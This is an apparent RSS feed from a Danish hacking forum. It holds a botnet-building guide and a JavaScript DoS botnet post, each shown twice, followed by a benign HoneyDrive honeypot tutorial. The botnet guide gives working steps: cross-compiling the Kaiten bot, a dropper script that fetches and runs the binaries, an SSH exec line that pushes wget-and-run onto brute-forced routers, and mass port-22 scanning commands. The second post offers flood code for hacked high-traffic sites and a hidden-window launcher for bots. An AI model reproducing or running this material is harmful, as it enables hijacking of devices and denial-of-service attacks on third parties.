wget <a href="http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sh4.tar.bz2" target="_blank" rel="noopener" class="mycode_url">http://uclibc.org/downloads/binaries/0.9...h4.tar.bz2</a> &amp;&amp; tar -xvjf cross-compiler-sh4.tar.bz2 &amp;&amp; rm -rf cross-compiler-sh4.tar.bz2<br />
wget <a href="http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-x86_32.tar.bz2" target="_blank" rel="noopener" class="mycode_url">http://uclibc.org/downloads/binaries/0.9...32.tar.bz2</a> &amp;&amp; tar -xvjf cross-compiler-x86_32.tar.bz2  &amp;&amp; rm -cross-compiler-x86_32.tar.bz2<br />
</code></pre>
<br />
Efter du har gemt din redigering skal du chmod filen (s.sh). <br />
For at chmod filen skriv: chmod 777 s.sh<br />
Efter det er gjort skal du skrive sh s.sh og så lad den køre.<br />
<br />
Nu skal du downloade en irc bot som er passende og for startere anbefaler jeg Kaiten.<br />
<br />
Download Kaiten her: <a href="http://ftp.109.235.50.139/pub/kaiten.c" target="_blank" rel="noopener" class="mycode_url">ftp.109.235.50.139/pub/kaiten.c</a><br />
Når Kaiten er installeret skal du redigere kaiten.c til dine egne informationer efter et er gjort skal du upload din modificeret version af Kaiten med dine infos.<br />
Nu skal du cd ind i /root/LA/bin når det er gjordt cd til alle dine compliers og complie dem.<br />
Eksemepl:<br />
<pre class="line-numbers"><code class="language-php">cd cross-compiler-mipsel/bin<br />
wget ftp://DitFtpLinkForModificeretKaiten<br />
./mipsel-gcc -o mipsel kaiten.c<br />
og sådan skal du bare gøre med resten af dine cross compliers.<br />
</code></pre>
Efter du har cross complied er der en ny fil som hedder det samme som compilied cross complier den køre du foreksempel sådan her:<br />
/mipsel-gcc -o mipsel kaiten.c det laver en ny fil som hedder mipsel, filen er din complied kaiten du vil bruge i botex.<br />
Når det er gjort skriv mkdir /root/Compiled og flyt alle dine compliede bots derhen. Eksempel: mv mipsel /root/Compiled<br />
<br />
Nu skal du installere Httpd, ved brug af yum install, apt-get etc.<br />
Når du har downloadet Httpd skriv <span style="font-weight: bold;" class="mycode_b">service httpd start</span> for at starte httpd.<br />
Efter du har startet httpd så skal du cd ind i din compiled mappe og flyt alt over i /var/www/html/. <br />
Eksempel: mv mips mipsel sh4 powerpc x86_64 armv5l /var/www/html/<br />
Skriv cd /var/www/html/ for at cd til /var/www/html/ og skriv så nano gb.sh og redigere den med koden herunder:<br />
<pre class="line-numbers"><code class="language-php">#!/bin/sh<br />
<br />
wget -c <a href="http://ditlink.dk/armv5l" target="_blank" rel="noopener" class="mycode_url">http://ditlink.dk/armv5l</a> -P /var/run &amp;&amp; chmod +x /var/run/armv5l &amp;&amp; /var/run/armv5l<br />
wget -c <a href="http://ditlink.dk/mips" target="_blank" rel="noopener" class="mycode_url">http://ditlink.dk/mips</a> -P /var/run &amp;&amp; chmod +x /var/run/mips &amp;&amp; /var/run/mips<br />
wget -c <a href="http://ditlink.dk/mipsel" target="_blank" rel="noopener" class="mycode_url">http://ditlink.dk/mipsel</a> -P /var/run &amp;&amp; chmod +x /var/run/mipsel &amp;&amp; /var/run/mipsel<br />
wget -c <a href="http://ditlink.dk/powerpc" target="_blank" rel="noopener" class="mycode_url">http://ditlink.dk/powerpc</a> -P /var/run &amp;&amp; chmod +x /var/run/powerpc &amp;&amp; /var/run/powerpc<br />
wget -c <a href="http://ditlink.dk/sh4" target="_blank" rel="noopener" class="mycode_url">http://ditlink.dk/sh4</a> -P /var/run &amp;&amp; chmod +x /var/run/sh4 &amp;&amp; /var/run/sh4<br />
wget -c <a href="http://ditlink.dk/x86_64" target="_blank" rel="noopener" class="mycode_url">http://ditlink.dk/x86_64</a> -P /var/run &amp;&amp; chmod +x /var/run/x86_64 &amp;&amp; /var/run/x86_64<br />
<br />
sleep 3;<br />
rm -fr /var/run/gb.sh<br />
</code></pre>
<br />
Gem redigeringer og chmod filen gb.sh. <br />
Eksempel: chmod 777 gb.sh<br />
<br />
Nu skal du installere <span style="font-weight: bold;" class="mycode_b">Botex</span><br />
Installere disse moduler med cpan<br />
<pre class="line-numbers"><code class="language-php">cpan force install IO::Socket<br />
cpan force install IO::Select <br />
cpan force install Parallel::ForkManager<br />
cpan force install Net::SSH2<br />
</code></pre>
Efter det skriv følgende i din terminal for at rette ssh2:<br />
<pre class="line-numbers"><code class="language-php">yum install gcc php-devel php-pear libssh2 libssh2-devel<br />
pecl install -f ssh2<br />
touch /etc/php.d/ssh2.ini<br />
echo extension=ssh2.so &gt; /etc/php.d/ssh2.ini<br />
cpan force install Net::SSH2<br />
</code></pre>
Nu skal du download LRAB<br />
Link: <a href="https://b.1339.cf/surknso.rar" target="_blank" rel="noopener" class="mycode_url">https://b.1339.cf/surknso.rar</a><br />
<br />
Når du har overført LRAB til din server efter at have downloaded og unzippet den på din computer så åben LRAB og åben filen "wget.pl" og gå så over til linje 26 i wget.pl og ændre linjen.<br />
<pre class="line-numbers"><code class="language-php">channel-&gt;exec('cd /tmp &amp;&amp; wget <a href="http://ditlink.dk/gb.sh" target="_blank" rel="noopener" class="mycode_url">http://ditlink.dk/gb.sh</a> &amp;&amp; sh gb.sh &amp;&amp; rm -rf gb.sh');<br />
</code></pre>
Når et er gjort skal du scanne for at lave lister, sådan her lavet du et scan.<br />
<pre class="line-numbers"><code class="language-php">./class PORT -a RANGE -i INTERFACE -s 10<br />
</code></pre>
Når du har lavet en liste så skriv ./go og så vil den spørge om "Max Process" og så sæt den mellem 600 og 1000 og så bruteforcer den listen du har lavet. Når bruteforcing er færdigt så nano wget.pl og redigere linje 11<br />
<pre class="line-numbers"><code class="language-php">open(fh,'&lt;','vuln.txt'); @newarray; while (&lt;fh&gt;){ @array = split(':',&#36;_);<br />
</code></pre>
Ændre vuln.txt til din txt-fil og gemt så filen wget.pl og i din terminal skal du så bare execute wget.pl med perl<br />
Eksempel: perl wget.pl<br />
<br />
Jeg har lavet en masse fil for scanning af min modificeret LRAB version.<br />
<pre class="line-numbers"><code class="language-php">./class 22 -a 170 -i eth0 -s 10<br />
./class 22 -a 171 -i eth0 -s 10<br />
./class 22 -a 172 -i eth0 -s 10<br />
./class 22 -a 173 -i eth0 -s 10<br />
./class 22 -a 174 -i eth0 -s 10<br />
./class 22 -a 175 -i eth0 -s 10<br />
./class 22 -a 176 -i eth0 -s 10<br />
./class 22 -a 177 -i eth0 -s 10<br />
./class 22 -a 178 -i eth0 -s 10<br />
./class 22 -a 179 -i eth0 -s 10<br />
./class 22 -a 130 -i eth0 -s 10<br />
./class 22 -a 131 -i eth0 -s 10<br />
./class 22 -a 132 -i eth0 -s 10<br />
./class 22 -a 133 -i eth0 -s 10<br />
./class 22 -a 134 -i eth0 -s 10<br />
./class 22 -a 135 -i eth0 -s 10<br />
./class 22 -a 136 -i eth0 -s 10<br />
./class 22 -a 137 -i eth0 -s 10<br />
./class 22 -a 138 -i eth0 -s 10<br />
./class 22 -a 139 -i eth0 -s 10<br />
./class 22 -a 140 -i eth0 -s 10<br />
cat bios.txt | sort | uniq &gt; mfu.txt<br />
screen ./update 5000<br />
</code></pre>
Update er bedre modificeret bruteforcer. Hvis du er nervøs for at bruge update fordi den er obfusticated så skriv screen ./go 5000<br />
<br />
Tillykke du nu sat op light adria og LRAB op og har lært at bruteforce routere.]]></description>
			<content:encoded><![CDATA[<span style="color: #FF4500;" class="mycode_color"><span style="font-size: medium;" class="mycode_size"><div style="text-align: center;" class="mycode_align">Light Aidra og LRAB - Bruteforce dig til et stort botnet.<br />
Vejledning af Sc0rp10n</div></span></span><br />
<br />
Du skal have en dedikeret server som tillader scanning og hvilken som helst server som er unmetered.<br />
<br />
Download Light Aidra her: <a href="http://0xplanet.com/archive/Botnets/LightHydra/lightaidra-master.zip" target="_blank" rel="noopener" class="mycode_url">http://0xplanet.com/archive/Botnets/Ligh...master.zip</a><br />
Efter du har unzippet filen og omdøbt filen til noget kort.<br />
Når LA er placeret et sted og omdøbt så cd hen til LA så skriv mkdir bin -<br />
Derefter cd til bin og skriv derefter nano s.sh og tilføj cross compliers.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Cross compliers i raw link format</span>: <a href="http://pastebin.com/raw.php?i=edrqt9RB" target="_blank" rel="noopener" class="mycode_url">http://pastebin.com/raw.php?i=edrqt9RB</a><br />
<pre class="line-numbers"><code class="language-php">wget <a href="http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mips.tar.bz2" target="_blank" rel="noopener" class="mycode_url">http://uclibc.org/downloads/binaries/0.9...ps.tar.bz2</a> &amp;&amp; tar -xvjf cross-compiler-mips.tar.bz2 &amp;&amp; rm -rf cross-compiler-mips.tar.bz2<br />
wget <a href="http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mipsel.tar.bz2" target="_blank" rel="noopener" class="mycode_url">http://uclibc.org/downloads/binaries/0.9...el.tar.bz2</a> &amp;&amp; tar -xvjf cross-compiler-mipsel.tar.bz2 &amp;&amp; rm -rf cross-compiler-mipsel.tar.bz2<br />
wget <a href="http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv5l.tar.bz2" target="_blank" rel="noopener" class="mycode_url">http://uclibc.org/downloads/binaries/0.9...5l.tar.bz2</a> &amp;&amp; tar -xvjf cross-compiler-armv5l.tar.bz2 &amp;&amp; rm -rf cross-compiler-armv5l.tar.bz2<br />
wget <a href="http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-powerpc.tar.bz2" target="_blank" rel="noopener" class="mycode_url">http://uclibc.org/downloads/binaries/0.9...pc.tar.bz2</a> &amp;&amp; tar -xvjf cross-compiler-powerpc.tar.bz2  &amp;&amp; rm -rf cross-compiler-powerpc.tar.bz2<br />
wget <a href="http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sh4.tar.bz2" target="_blank" rel="noopener" class="mycode_url">http://uclibc.org/downloads/binaries/0.9...h4.tar.bz2</a> &amp;&amp; tar -xvjf cross-compiler-sh4.tar.bz2 &amp;&amp; rm -rf cross-compiler-sh4.tar.bz2<br />
wget <a href="http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-x86_32.tar.bz2" target="_blank" rel="noopener" class="mycode_url">http://uclibc.org/downloads/binaries/0.9...32.tar.bz2</a> &amp;&amp; tar -xvjf cross-compiler-x86_32.tar.bz2  &amp;&amp; rm -cross-compiler-x86_32.tar.bz2<br />
</code></pre>
<br />
Efter du har gemt din redigering skal du chmod filen (s.sh). <br />
For at chmod filen skriv: chmod 777 s.sh<br />
Efter det er gjort skal du skrive sh s.sh og så lad den køre.<br />
<br />
Nu skal du downloade en irc bot som er passende og for startere anbefaler jeg Kaiten.<br />
<br />
Download Kaiten her: <a href="http://ftp.109.235.50.139/pub/kaiten.c" target="_blank" rel="noopener" class="mycode_url">ftp.109.235.50.139/pub/kaiten.c</a><br />
Når Kaiten er installeret skal du redigere kaiten.c til dine egne informationer efter et er gjort skal du upload din modificeret version af Kaiten med dine infos.<br />
Nu skal du cd ind i /root/LA/bin når det er gjordt cd til alle dine compliers og complie dem.<br />
Eksemepl:<br />
<pre class="line-numbers"><code class="language-php">cd cross-compiler-mipsel/bin<br />
wget ftp://DitFtpLinkForModificeretKaiten<br />
./mipsel-gcc -o mipsel kaiten.c<br />
og sådan skal du bare gøre med resten af dine cross compliers.<br />
</code></pre>
Efter du har cross complied er der en ny fil som hedder det samme som compilied cross complier den køre du foreksempel sådan her:<br />
/mipsel-gcc -o mipsel kaiten.c det laver en ny fil som hedder mipsel, filen er din complied kaiten du vil bruge i botex.<br />
Når det er gjort skriv mkdir /root/Compiled og flyt alle dine compliede bots derhen. Eksempel: mv mipsel /root/Compiled<br />
<br />
Nu skal du installere Httpd, ved brug af yum install, apt-get etc.<br />
Når du har downloadet Httpd skriv <span style="font-weight: bold;" class="mycode_b">service httpd start</span> for at starte httpd.<br />
Efter du har startet httpd så skal du cd ind i din compiled mappe og flyt alt over i /var/www/html/. <br />
Eksempel: mv mips mipsel sh4 powerpc x86_64 armv5l /var/www/html/<br />
Skriv cd /var/www/html/ for at cd til /var/www/html/ og skriv så nano gb.sh og redigere den med koden herunder:<br />
<pre class="line-numbers"><code class="language-php">#!/bin/sh<br />
<br />
wget -c <a href="http://ditlink.dk/armv5l" target="_blank" rel="noopener" class="mycode_url">http://ditlink.dk/armv5l</a> -P /var/run &amp;&amp; chmod +x /var/run/armv5l &amp;&amp; /var/run/armv5l<br />
wget -c <a href="http://ditlink.dk/mips" target="_blank" rel="noopener" class="mycode_url">http://ditlink.dk/mips</a> -P /var/run &amp;&amp; chmod +x /var/run/mips &amp;&amp; /var/run/mips<br />
wget -c <a href="http://ditlink.dk/mipsel" target="_blank" rel="noopener" class="mycode_url">http://ditlink.dk/mipsel</a> -P /var/run &amp;&amp; chmod +x /var/run/mipsel &amp;&amp; /var/run/mipsel<br />
wget -c <a href="http://ditlink.dk/powerpc" target="_blank" rel="noopener" class="mycode_url">http://ditlink.dk/powerpc</a> -P /var/run &amp;&amp; chmod +x /var/run/powerpc &amp;&amp; /var/run/powerpc<br />
wget -c <a href="http://ditlink.dk/sh4" target="_blank" rel="noopener" class="mycode_url">http://ditlink.dk/sh4</a> -P /var/run &amp;&amp; chmod +x /var/run/sh4 &amp;&amp; /var/run/sh4<br />
wget -c <a href="http://ditlink.dk/x86_64" target="_blank" rel="noopener" class="mycode_url">http://ditlink.dk/x86_64</a> -P /var/run &amp;&amp; chmod +x /var/run/x86_64 &amp;&amp; /var/run/x86_64<br />
<br />
sleep 3;<br />
rm -fr /var/run/gb.sh<br />
</code></pre>
<br />
Gem redigeringer og chmod filen gb.sh. <br />
Eksempel: chmod 777 gb.sh<br />
<br />
Nu skal du installere <span style="font-weight: bold;" class="mycode_b">Botex</span><br />
Installere disse moduler med cpan<br />
<pre class="line-numbers"><code class="language-php">cpan force install IO::Socket<br />
cpan force install IO::Select <br />
cpan force install Parallel::ForkManager<br />
cpan force install Net::SSH2<br />
</code></pre>
Efter det skriv følgende i din terminal for at rette ssh2:<br />
<pre class="line-numbers"><code class="language-php">yum install gcc php-devel php-pear libssh2 libssh2-devel<br />
pecl install -f ssh2<br />
touch /etc/php.d/ssh2.ini<br />
echo extension=ssh2.so &gt; /etc/php.d/ssh2.ini<br />
cpan force install Net::SSH2<br />
</code></pre>
Nu skal du download LRAB<br />
Link: <a href="https://b.1339.cf/surknso.rar" target="_blank" rel="noopener" class="mycode_url">https://b.1339.cf/surknso.rar</a><br />
<br />
Når du har overført LRAB til din server efter at have downloaded og unzippet den på din computer så åben LRAB og åben filen "wget.pl" og gå så over til linje 26 i wget.pl og ændre linjen.<br />
<pre class="line-numbers"><code class="language-php">channel-&gt;exec('cd /tmp &amp;&amp; wget <a href="http://ditlink.dk/gb.sh" target="_blank" rel="noopener" class="mycode_url">http://ditlink.dk/gb.sh</a> &amp;&amp; sh gb.sh &amp;&amp; rm -rf gb.sh');<br />
</code></pre>
Når et er gjort skal du scanne for at lave lister, sådan her lavet du et scan.<br />
<pre class="line-numbers"><code class="language-php">./class PORT -a RANGE -i INTERFACE -s 10<br />
</code></pre>
Når du har lavet en liste så skriv ./go og så vil den spørge om "Max Process" og så sæt den mellem 600 og 1000 og så bruteforcer den listen du har lavet. Når bruteforcing er færdigt så nano wget.pl og redigere linje 11<br />
<pre class="line-numbers"><code class="language-php">open(fh,'&lt;','vuln.txt'); @newarray; while (&lt;fh&gt;){ @array = split(':',&#36;_);<br />
</code></pre>
Ændre vuln.txt til din txt-fil og gemt så filen wget.pl og i din terminal skal du så bare execute wget.pl med perl<br />
Eksempel: perl wget.pl<br />
<br />
Jeg har lavet en masse fil for scanning af min modificeret LRAB version.<br />
<pre class="line-numbers"><code class="language-php">./class 22 -a 170 -i eth0 -s 10<br />
./class 22 -a 171 -i eth0 -s 10<br />
./class 22 -a 172 -i eth0 -s 10<br />
./class 22 -a 173 -i eth0 -s 10<br />
./class 22 -a 174 -i eth0 -s 10<br />
./class 22 -a 175 -i eth0 -s 10<br />
./class 22 -a 176 -i eth0 -s 10<br />
./class 22 -a 177 -i eth0 -s 10<br />
./class 22 -a 178 -i eth0 -s 10<br />
./class 22 -a 179 -i eth0 -s 10<br />
./class 22 -a 130 -i eth0 -s 10<br />
./class 22 -a 131 -i eth0 -s 10<br />
./class 22 -a 132 -i eth0 -s 10<br />
./class 22 -a 133 -i eth0 -s 10<br />
./class 22 -a 134 -i eth0 -s 10<br />
./class 22 -a 135 -i eth0 -s 10<br />
./class 22 -a 136 -i eth0 -s 10<br />
./class 22 -a 137 -i eth0 -s 10<br />
./class 22 -a 138 -i eth0 -s 10<br />
./class 22 -a 139 -i eth0 -s 10<br />
./class 22 -a 140 -i eth0 -s 10<br />
cat bios.txt | sort | uniq &gt; mfu.txt<br />
screen ./update 5000<br />
</code></pre>
Update er bedre modificeret bruteforcer. Hvis du er nervøs for at bruge update fordi den er obfusticated så skriv screen ./go 5000<br />
<br />
Tillykke du nu sat op light adria og LRAB op og har lært at bruteforce routere.]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Javascript botnet]]></title>
			<link>https://www.shellsec.pw/traad-javascript-botnet</link>
			<pubDate>Sun, 12 Jul 2015 01:03:13 +0200</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-javascript-botnet</guid>
			<description><![CDATA[<span style="font-size: large;" class="mycode_size">Introduktion:</span><br />
Hej. Da jeg bedre kan formulere og forklare mig på engelsk - har jeg valgt at skrive hele tråden om på engelsk. Det må i leve med. <br />
<br />
Welcome to my thread, I will introduce you all into making a simple but stable javascript botnet that can perform a dos attack. The dos attack can be very strong if you have a good amount of traffic being sent to the javascript botnet when it is up and running.<br />
<br />
Now to the setup part...<br />
<br />
This is very easy to setup. All you have to do is to copy and paste the first code into your editor/complier and save it in the proper extension (JS).<br />
When instructions are followed you can upload your script to your hacked webhost or your own webhost, then you can use your traffic as your power source. <br />
Imagine you the power of this, if you hack a host with domains with lots of traffic and put up your arbitrary file (JS-file) on the webhost and then you will have a very powerful attack source and since the code is small and easy configured.<br />
You will always be able to receive heck lots of traffic and change the target on your "small" but powerful botnet used to perform DOS attacks. All you need is traffic, no more scanning / exploiting / bruting...<br />
<br />
<pre class="line-numbers"><code class="language-javascript">function jsflood() {<br />
   var HOST = 'target.com'<br />
   var URI = '/'<br />
   var img = new Image()<br />
   var rand = Math.floor(Math.random() * 1000)<br />
   img.src = 'http://'+TARGET+URI+'?keywords='+rand+"=Javascript botnet"<br />
}<br />
<br />
setInterval(jsflood, 0)<br />
</code></pre>
<br />
The script below is a script I've wrote quickly. It was written in VB.<br />
If you don't have any experience in hacking and can't obtain any traffic or find any reliable traffic sources or just want to get more traffic, then this is good for you.<br />
When you have your domain and host up and running then you can use your windows bots as traffic. Basically you put this into your console application and build it and run it on your bots and ABRACADABRA !<br />
<br />
<span style="font-size: large;" class="mycode_size">Complie and run...</span><br />
<pre class="line-numbers"><code class="language-javascript">Process proc = new Process();<br />
proc.StartInfo.UseShellExecute = false;<br />
proc.StartInfo.CreateNoWindow = true;<br />
proc.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;<br />
process.start("trafikmodtageneside.dk")<br />
proc.StartInfo.RedirectStandardError = false;<br />
proc.StartInfo.RedirectStandardOutput = false;<br />
proc.StartInfo.UseShellExecute = false;<br />
proc.StartInfo.CreateNoWindow = true;<br />
proc.Start();<br />
proc.WaitForExit();<br />
</code></pre>]]></description>
			<content:encoded><![CDATA[<span style="font-size: large;" class="mycode_size">Introduktion:</span><br />
Hej. Da jeg bedre kan formulere og forklare mig på engelsk - har jeg valgt at skrive hele tråden om på engelsk. Det må i leve med. <br />
<br />
Welcome to my thread, I will introduce you all into making a simple but stable javascript botnet that can perform a dos attack. The dos attack can be very strong if you have a good amount of traffic being sent to the javascript botnet when it is up and running.<br />
<br />
Now to the setup part...<br />
<br />
This is very easy to setup. All you have to do is to copy and paste the first code into your editor/complier and save it in the proper extension (JS).<br />
When instructions are followed you can upload your script to your hacked webhost or your own webhost, then you can use your traffic as your power source. <br />
Imagine you the power of this, if you hack a host with domains with lots of traffic and put up your arbitrary file (JS-file) on the webhost and then you will have a very powerful attack source and since the code is small and easy configured.<br />
You will always be able to receive heck lots of traffic and change the target on your "small" but powerful botnet used to perform DOS attacks. All you need is traffic, no more scanning / exploiting / bruting...<br />
<br />
<pre class="line-numbers"><code class="language-javascript">function jsflood() {<br />
   var HOST = 'target.com'<br />
   var URI = '/'<br />
   var img = new Image()<br />
   var rand = Math.floor(Math.random() * 1000)<br />
   img.src = 'http://'+TARGET+URI+'?keywords='+rand+"=Javascript botnet"<br />
}<br />
<br />
setInterval(jsflood, 0)<br />
</code></pre>
<br />
The script below is a script I've wrote quickly. It was written in VB.<br />
If you don't have any experience in hacking and can't obtain any traffic or find any reliable traffic sources or just want to get more traffic, then this is good for you.<br />
When you have your domain and host up and running then you can use your windows bots as traffic. Basically you put this into your console application and build it and run it on your bots and ABRACADABRA !<br />
<br />
<span style="font-size: large;" class="mycode_size">Complie and run...</span><br />
<pre class="line-numbers"><code class="language-javascript">Process proc = new Process();<br />
proc.StartInfo.UseShellExecute = false;<br />
proc.StartInfo.CreateNoWindow = true;<br />
proc.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;<br />
process.start("trafikmodtageneside.dk")<br />
proc.StartInfo.RedirectStandardError = false;<br />
proc.StartInfo.RedirectStandardOutput = false;<br />
proc.StartInfo.UseShellExecute = false;<br />
proc.StartInfo.CreateNoWindow = true;<br />
proc.Start();<br />
proc.WaitForExit();<br />
</code></pre>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Kom i gang med HoneyDrive Honeypot]]></title>
			<link>https://www.shellsec.pw/traad-kom-i-gang-med-honeydrive-honeypot</link>
			<pubDate>Fri, 17 Apr 2015 04:19:15 +0200</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-kom-i-gang-med-honeydrive-honeypot</guid>
			<description><![CDATA[<span style="font-weight: bold;" class="mycode_b">Indledning:</span><br />
Der er blevet ønsket nogle informationer om honeypots, så her er en lille guide til at hjælpe dem i gang, der gerne vil have et indblik i, hvordan det virker.<br />
Jeg har med vilje valgt en færdigbygget distro, for at slippe for at skulle beskrive installation og opsætning af denne. <br />
<br />
Produktet vi vil se lidt på, er HoneyDrive version 3 fra Bruteforce.gr. Bemærk at den første version hed 0.1 og den næste version hed 0.2, men da både brugerne og ophavsmanden synes det var lidt underligt, sprang man der efter direkte til version 3. Det er en VM og er bygget til Oracle VirtualBox.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Om Honeydrive:</span><br />
HoneyDrive er en samlig af honeypots, så man skal vælge hvad man vil køre. Der er et overlap i de porte de forskellige honeypots lytter på, alt efter hvilke services de virker med. Og der er forskellige typer honeypots. Her til, er der nogle scripts og nogle web interfaces til at se statistikker osv med. HoneyDrive er baseret på Ubuntu. Brugeren og koden til Honeydrive er honeydrive:honeydrive, dog bliver man automatisk logget på, når den booter. Denne bruger er en sudo bruger.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Kippo:</span><br />
Kippo er en medium-interaction SSH honeypot. Dette betyder, at en bruger/hacker der f.eks. har held med at brugeforce koden, faktisk kan indtaste kommandoer og få nogen lunde realistisk output tilbage. Outputtet er statisk, så det er ret nemt at se, det er en honeypot, hvis man bare er opmærksom på det. Man kan godt ændre disse statiske ting, og ændre i filsystemet, som f.eks. lave nye mapper, og definere nye kommandoer, ændre i nuværende osv., men det er ikke just en dans på roser.<br />
Når man bruger Kippo, vil hele brugerens session blive gemt, og man kan så afspille denne log, for at se alt hvad brugeren gør. Man kan få et indblik i, hvordan hackerne arbejder. De filedownloads brugeren udfører, vil blive gemt, så du kan se på dem efterfølgende.<br />
Selv om brugeren forsøger at eksekvere de filer, der bliver downloaded, sker der ikke noget, så man skal ikke være bange for at blive inficeret med noget.<br />
<br />
Kippo startes med følgende kommando:<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>&#36; sh /honeydrive/kippo/start.sh</blockquote>
Og stoppes med:<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>&#36; sh /honeydrive/kippo/stop.sh</blockquote>
<br />
Så vidt jeg husker, vil Kippo ikke køre som root.<br />
Når først Kippo er kørende, er det bare at vente på, nogen bider på krogen.<br />
Det sjove er selvfølgelig at se de data der bliver samlet.<br />
Man skal selvfølgelig huske at hive HoneyDrive af nettet, da det kræver man startet Apache2 og det gøres med:<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>&#36; service apache2 start</blockquote>
<br />
Start en browser og besøg "http://127.0.0.1/kippo-graph/".<br />
<br />
Jeg har sat nogle screenshots ind, men det giver selvfølgelig et bedre billede, hvis man selv kan kigge. Jeg viser heller ikke det hele, så se det som en appetitvækker.<br />
<br />
<!-- start: postbit_attachments_attachment -->
<br /><!-- start: attachment_icon -->
<img src="https://www.shellsec.pw/images/attachtypes/image.gif" title="PNG Image" border="0" alt=".png" />
<!-- end: attachment_icon -->&nbsp;&nbsp;<a href="attachment.php?aid=86" target="_blank" title="">ki_gra_7.PNG</a> (Størrelse: 102,93 KB / Downloads: 42)
<!-- end: postbit_attachments_attachment --><br />
<br />
<!-- start: postbit_attachments_attachment -->
<br /><!-- start: attachment_icon -->
<img src="https://www.shellsec.pw/images/attachtypes/image.gif" title="PNG Image" border="0" alt=".png" />
<!-- end: attachment_icon -->&nbsp;&nbsp;<a href="attachment.php?aid=87" target="_blank" title="">ki_gra_3.PNG</a> (Størrelse: 37,76 KB / Downloads: 25)
<!-- end: postbit_attachments_attachment --><br />
<br />
Kippo gemmer downloaded filer i "/honeydrive/kippo/dl/" og de aktivitetslogs der bliver dannet, når en logger ind på Kippo "ssh server", ligger i "/honeydrive/kippo/log/tty/".<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Dionaea:</span><br />
En anden form for honeypot er Dionaea og denne virker helt anderledes. Det er ikke meningen, den skal have nogen interaktion med brugeren. <br />
Den er bygget til at samle malware med. Oftest noget der kommer fra bots, der "surfer" nettet efter ofre, den kan angribe automatisk.<br />
Derfor lytter den efter bestemte services, og når der kommer en request, svarer den så godt den kan, med det for øje, at få maskinen "inficeret". Maskinen bliver selvfølgelig ikke inficeret, men Dionaea downloader malwaren, så den kan researches. Det er selvfølgelig mest interessant, hvis man gerne vil reverse malwaren og undersøge malware trends. Og selvfølgelig evt. samle 0-days op til analyse.<br />
<br />
Dionaea startes med:<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>&#36; sh /honeydrive/dionaea-vagrant/runDionaea.sh</blockquote>
<br />
For a se statistikker fra Dionaea, bruger jeg DionaeaFR og dette startes med:<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>/honeydrive/DionaeaFR&#36; python manage.py runserver</blockquote>
<br />
Start så en browser og besøg "https://127.0.0.1:8000/".<br />
<br />
Jeg kan ikke huske om DionaeaFR kun lytter på localhost, men det er selvfølgelig en god idé at sørge for, den ikke kan nås fra Internettet, når man kigger på disse data.<br />
<br />
<!-- start: postbit_attachments_attachment -->
<br /><!-- start: attachment_icon -->
<img src="https://www.shellsec.pw/images/attachtypes/image.gif" title="PNG Image" border="0" alt=".png" />
<!-- end: attachment_icon -->&nbsp;&nbsp;<a href="attachment.php?aid=89" target="_blank" title="">dio_binary.PNG</a> (Størrelse: 83,42 KB / Downloads: 24)
<!-- end: postbit_attachments_attachment --><br />
<br />
<!-- start: postbit_attachments_attachment -->
<br /><!-- start: attachment_icon -->
<img src="https://www.shellsec.pw/images/attachtypes/image.gif" title="PNG Image" border="0" alt=".png" />
<!-- end: attachment_icon -->&nbsp;&nbsp;<a href="attachment.php?aid=88" target="_blank" title="">dio_fr_5.PNG</a> (Størrelse: 39,47 KB / Downloads: 16)
<!-- end: postbit_attachments_attachment --><br />
<br />
Dionaea gemmer malware, den har hentet/modtaget i "/opt/dionaea/var/dionaea/binaries/", så det kan være en god idé at holde lidt øje her.<br />
<br />
Netstat med Kippo og Dionaea kørende:<br />
<br />
<!-- start: postbit_attachments_attachment -->
<br /><!-- start: attachment_icon -->
<img src="https://www.shellsec.pw/images/attachtypes/image.gif" title="PNG Image" border="0" alt=".png" />
<!-- end: attachment_icon -->&nbsp;&nbsp;<a href="attachment.php?aid=85" target="_blank" title="">honey_netstat.PNG</a> (Størrelse: 135,48 KB / Downloads: 22)
<!-- end: postbit_attachments_attachment --><br />
<br />
Som man kan se, kan der være ret meget traffik.<br />
Jeg har faktisk også været ude for, at et helt klasse C netværk kørte SSH bruteforce eller dictionary attack mod min honeypot. Det må man sige at være organiseret kriminalitet.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">OBS:</span><br />
For at få noget traffik på en honeypot, skal den selvfølgelig kunne tilgås fra Internettet. Enten direkte på nettet, eller via NAT eller lign.<br />
Vær opmærksom på at Apache automatisk starter på HoneyDrive, så vis man booter HoneyDrive, og maskinen er direkte på nettet, vil alle i verden kunne se Kippos statistikker. Og det må siges at være et lidt for tydeligt hint for en hacker, om at det er en honeypot. Et andet problem med dette er, at hvis man bruger en anden honeypot som lytter på port 80, vil porten allerede være i brug af Apache. Det anbefales at slå dette fra.<br />
En lille fodnote: Hvis du sætter den direkte på Nettet og host operativsystemet er windows, skal du sikre dig, din windows maskine ikke får en offentlig IP, og ikke kan tilgås fra Internettet. Desværre kan man ikke bare deaktivere hostens netkort, så vil guest operativsystemet (HoneyDrive) heller ikke være tilgængelig. Et trick kan være at lade netkortet på hosten (windows) være aktivt, men slå IPv4 og IPv6 fra.<br />
Disse udfordringer har man ikke med Linux som host operativsystem.<br />
